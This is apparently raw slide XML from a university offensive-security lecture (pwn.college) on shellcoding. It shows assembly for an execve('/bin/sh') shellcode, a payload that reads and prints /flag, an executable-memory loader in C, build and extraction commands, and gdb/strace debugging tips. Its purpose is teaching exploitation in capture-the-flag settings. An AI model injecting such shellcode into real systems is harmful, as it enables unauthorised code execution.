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9" r:id="rId4"/>
    <p:sldMasterId id="214748369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c717ad36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c717ad36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9605bf38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9605bf38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355bd7e67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355bd7e67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4355bd7e67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4355bd7e67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9605bf3899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9605bf3899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268fba137_0_8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268fba137_0_8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9605bf3899_1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9605bf3899_1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9605bf3899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9605bf3899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9605bf3899_1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9605bf3899_1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355bd7e6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355bd7e6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355bd7e67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355bd7e67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b34f8ef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b34f8ef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9605bf3899_1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9605bf3899_1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9605bf3899_1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9605bf3899_1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40953d030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40953d030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4355bd7e67_0_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4355bd7e67_0_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9605bf389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9605bf389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itle">
  <p:cSld name="TITLE_ONLY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11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2179341"/>
            <a:ext cx="7772400" cy="7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None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ncy Section Title">
  <p:cSld name="CUSTOM">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="351C75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219700" y="2287400"/>
            <a:ext cx="6523800" cy="5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2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="499975"/>
            <a:ext cx="6523800" cy="17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3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2856225"/>
            <a:ext cx="6523800" cy="17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deas">
  <p:cSld name="CUSTOM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2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="305568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deas">
  <p:cSld name="CUSTOM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537475" y="61833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2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="33494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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="1983875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ral Idea">
  <p:cSld name="CUSTOM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per Card">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EFEFE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inM98rrT.png" id="66" name="Google Shape;6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12450" y="1101425"/>
            <a:ext cx="6784150" cy="29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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359335" y="1236350"/>
            <a:ext cx="64557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359326" y="1528736"/>
            <a:ext cx="6455700" cy="22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endar">
  <p:cSld name="CUSTOM_3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Google Shape;71;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048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2" name="Google Shape;72;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096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3" name="Google Shape;73;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="128587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4" name="Google Shape;74;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="385762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5" name="Google Shape;75;p18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6" name="Google Shape;76;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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January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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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February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" name="Google Shape;78;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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March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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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April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" name="Google Shape;80;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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June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" name="Google Shape;82;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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July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4799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August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" name="Google Shape;84;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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September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" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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October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4799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November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78492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December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riller Source">
  <p:cSld name="TITLE_ONLY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username = input()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username == "service":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cmd_code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cmd_code == 7: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crash()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"Unknown command".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passcode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passcode &lt; 10000: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print "Invalid passcode!"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auth(username, passcode)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"Exiting..."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exit()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toi source">
  <p:cSld name="TITLE_ONLY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20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def atoi(s):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n =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for c in s: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if   c == '0': n = n*10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'1': n = n*10 + 1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'2': n = n*10 + 2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'3': n = n*10 + 3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'4': n = n*10 + 4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'5': n = n*10 + 5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'6': n = n*10 + 6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'7': n = n*10 + 7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'8': n = n*10 + 8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'9': n = n*10 + 9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else: break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return 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alysis Options">
  <p:cSld name="TITLE_AND_TWO_COLUMNS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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2508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Specification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should hold about the program?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Logical Properties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Absence of Crashes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Type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Efficiency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Memory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Information Disclosure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Authentication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9" name="Google Shape;99;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60636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Technique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will we achieve the goal?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:b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Manual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Symbolic Execution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Abstract Interpretation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Fuzzing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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do we want to achieve regarding the specification?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Verification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Testing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Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080325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21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986650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1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="346650" y="2154518"/>
            <a:ext cx="84507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Four_Boxes">
  <p:cSld name="Custom_Four_Boxe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1" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="4912520"/>
            <a:ext cx="64770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102430" y="4914900"/>
            <a:ext cx="762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457202" y="80010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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645481" y="800100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3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645477" y="2641146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4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454481" y="264727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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="630076"/>
            <a:ext cx="8382000" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="22225">
            <a:solidFill>
              <a:srgbClr val="0F5E9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2" name="Google Shape;11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4414" y="97655"/>
            <a:ext cx="814078" cy="49130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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619250" y="113564"/>
            <a:ext cx="71436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0" name="Google Shape;120;p2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" name="Google Shape;121;p2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4" name="Google Shape;124;p2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2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8" name="Google Shape;128;p26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" name="Google Shape;129;p26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TWO_COLUMNS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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200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" name="Google Shape;133;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692275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AND_TWO_COLUMNS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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2508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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60636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8" name="Google Shape;138;p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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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" name="Google Shape;142;p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5" name="Google Shape;145;p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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="233438"/>
            <a:ext cx="8229600" cy="46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0" name="Google Shape;150;p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itle">
  <p:cSld name="TITLE_ONLY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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2179341"/>
            <a:ext cx="7772400" cy="7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None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6" name="Google Shape;15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ncy Section Title">
  <p:cSld name="CUSTOM">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="351C75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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2287400"/>
            <a:ext cx="6523800" cy="5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9" name="Google Shape;159;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="499975"/>
            <a:ext cx="6523800" cy="17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60" name="Google Shape;160;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2856225"/>
            <a:ext cx="6523800" cy="17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61" name="Google Shape;161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deas">
  <p:cSld name="CUSTOM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4" name="Google Shape;164;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="305568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5" name="Google Shape;165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deas">
  <p:cSld name="CUSTOM_1_2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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="61833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8" name="Google Shape;168;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="33494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9" name="Google Shape;169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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="1983875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ral Idea">
  <p:cSld name="CUSTOM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3" name="Google Shape;173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per Card">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EFEFE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inM98rrT.png" id="175" name="Google Shape;175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12450" y="1101425"/>
            <a:ext cx="6784150" cy="29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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359335" y="1236350"/>
            <a:ext cx="64557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1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359326" y="1528736"/>
            <a:ext cx="6455700" cy="22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78" name="Google Shape;178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endar">
  <p:cSld name="CUSTOM_3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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="128587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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="385762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40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5" name="Google Shape;185;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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January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6" name="Google Shape;186;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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February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7" name="Google Shape;187;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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March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" name="Google Shape;188;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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April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" name="Google Shape;189;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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0" name="Google Shape;190;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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June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1" name="Google Shape;191;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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July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2" name="Google Shape;192;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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August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3" name="Google Shape;193;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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September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4" name="Google Shape;194;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751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October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5" name="Google Shape;195;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799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November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6" name="Google Shape;196;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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December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riller Source">
  <p:cSld name="TITLE_ONLY_2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1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41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username = input()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username == "service":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cmd_code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cmd_code == 7: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crash()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"Unknown command".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passcode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passcode &lt; 10000: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print "Invalid passcode!"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auth(username, passcode)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"Exiting..."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exit()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TWO_COLUMNS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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200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692275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toi source">
  <p:cSld name="TITLE_ONLY_2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2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3" name="Google Shape;203;p4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42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def atoi(s):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n =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for c in s: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if   c == '0': n = n*10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'1': n = n*10 + 1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'2': n = n*10 + 2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'3': n = n*10 + 3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'4': n = n*10 + 4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'5': n = n*10 + 5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'6': n = n*10 + 6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'7': n = n*10 + 7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'8': n = n*10 + 8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'9': n = n*10 + 9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else: break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return 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alysis Options">
  <p:cSld name="TITLE_AND_TWO_COLUMNS_1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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2508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Specification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should hold about the program?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Logical Properties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Absence of Crashes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Type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Efficiency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Memory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Information Disclosure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Authentication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08" name="Google Shape;208;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60636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Technique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will we achieve the goal?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:b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Manual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Symbolic Execution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Abstract Interpretation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Fuzzing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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do we want to achieve regarding the specification?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Verification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Testing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Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080325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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986650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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="346650" y="2154518"/>
            <a:ext cx="84507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AND_TWO_COLUMNS_1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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2508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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60636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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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457200" y="233438"/>
            <a:ext cx="8229600" cy="46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7.xml"/><Relationship Id="rId5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40.xml"/><Relationship Id="rId6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9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sourceware.org/gdb/onlinedocs/gdb/Reverse-Execution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pwn.colleg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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p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Yan Shoshitaishvili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Arizona State University</a:t>
            </a:r>
            <a:endParaRPr sz="1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Non-shell shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p5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Shellcode can have many different goals, other than just dropping a shell.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Specialized for our class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: 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sendfile(1, open("/flag", NULL), 0, 1000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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rbx, 0x00000067616c662f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push "/flag" filename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push rbx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rax, 2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syscall number of open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rdi, rsp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point the first argument at stack (where we have "/flag")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rsi, 0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NULL out the second argument (meaning, O_RDONLY)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syscall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trigger open("/flag", NULL)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rdi, 1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first argument to sendfile is the file descriptor to output to (stdout)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rsi, rax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second argument is the file descriptor returned by open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rdx, 0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third argument is the number of bytes to skip from the input file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r10, 1000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fourth argument is the number of bytes to transfer to the output file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rax, 40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syscall number of sendfile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syscall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trigger sendfile(1, fd, 0, 1000)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rax, 60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syscall number of exit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syscall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trigger exit()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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p5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W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>rite your shellcode as assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="15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.global _start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_start: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.intel_syntax noprefix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mov rax, 59		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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this is the syscall number of execve</a:t>
            </a:r>
            <a:endParaRPr sz="6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lea rdi, [rip+binsh]	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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points the first argument of execve at the /bin/sh string below</a:t>
            </a:r>
            <a:endParaRPr sz="6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mov rsi, 0		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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this makes the second argument, argv, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="6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mov rdx, 0		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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this makes the third argument, envp, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="6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syscall			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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this triggers the system call</a:t>
            </a:r>
            <a:endParaRPr sz="6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binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="6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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.string "/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="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/>
              <a:t>Then, assemble it!</a:t>
            </a:r>
            <a:endParaRPr sz="1500"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gcc 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-nostdlib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-static shellcode.s -o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shellcode-elf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This is an ELF with your shellcode as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>. You still need to extract it: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objcopy --dump-section .text=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode-raw</a:t>
            </a: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shellcode-elf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The resulting shellcode-raw file contains the raw bytes of your shellcode.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This is what you would inject as part of your exploits.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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p5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ELF from before is very useful for testing your shellcode!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gcc -nostdlib -static shellcode.s -o shellcode-elf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="13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	./shellcode-elf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Magic!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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Shellcode (replicating exotic conditions)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p5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need to replicate exotic conditions in ways that are too hard to do as a preamble for your shellcode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>you can build a shellcode loader in C:</a:t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page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, 0, 0);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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read(0, page, 0x1000);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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	((void(*)())page)();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cat shellcode-raw | ./tester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Debugging Shellcode: strace</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p5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 see if things are working from a high level, you can trace your shellcode with strace:</a:t>
            </a:r>
            <a:endParaRPr/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gcc -nostdlib -static shellcode.s -o shellcode-elf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="13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	strace ./shellcode-elf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can show you, at a high level, what your shellcode is doing (or not doing!).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Debugging Shellcode: gdb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p5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shellcode-elf is a Linux program, and you can debug it in gdb.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	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gdb ./shellcode-elf</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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Caveats: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there is no source code to display and navigate.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to print the next 5 instructions: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x/5i $rip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you can examine qwords (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x/gx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), dwords (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x/2dx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), halfwords (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x/4hx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), and bytes (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x/8b $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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to step one instruction (follow call instructions):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si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, NOT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to step one instruction (step over call instructions):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ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>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to break at an address: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break *0x400000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run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>,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continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, and reverse execution (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="8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https://sourceware.org/gdb/onlinedocs/gdb/Reverse-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>) work as expected</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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hardcode breakpoints in your shellcode!</a:t>
            </a:r>
            <a:endParaRPr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breakpoints are implemented with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>int3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> instruction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you can place this anywhere yourself!</a:t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especially useful at the start of shellcode to catch the beginning of shellcode execution</a:t>
            </a:r>
            <a:endParaRPr sz="1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Shellcode for other architectures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p5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way of building shellcode translates well to other architectures:</a:t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amd64: gcc -nostdlib -static shellcode.s -o shellcode-elf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 mips: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mips-linux-gnu-</a:t>
            </a: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gcc -nostdlib shellcode-mips.s -o shellcode-mips-elf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Similarly, we can run cross-architecture shellcode with an emulator:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="45720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amd64: ./shellcode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 mips: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>qemu-mips-static</a:t>
            </a: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 ./shellcode-mips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Useful qemu options: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-strace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
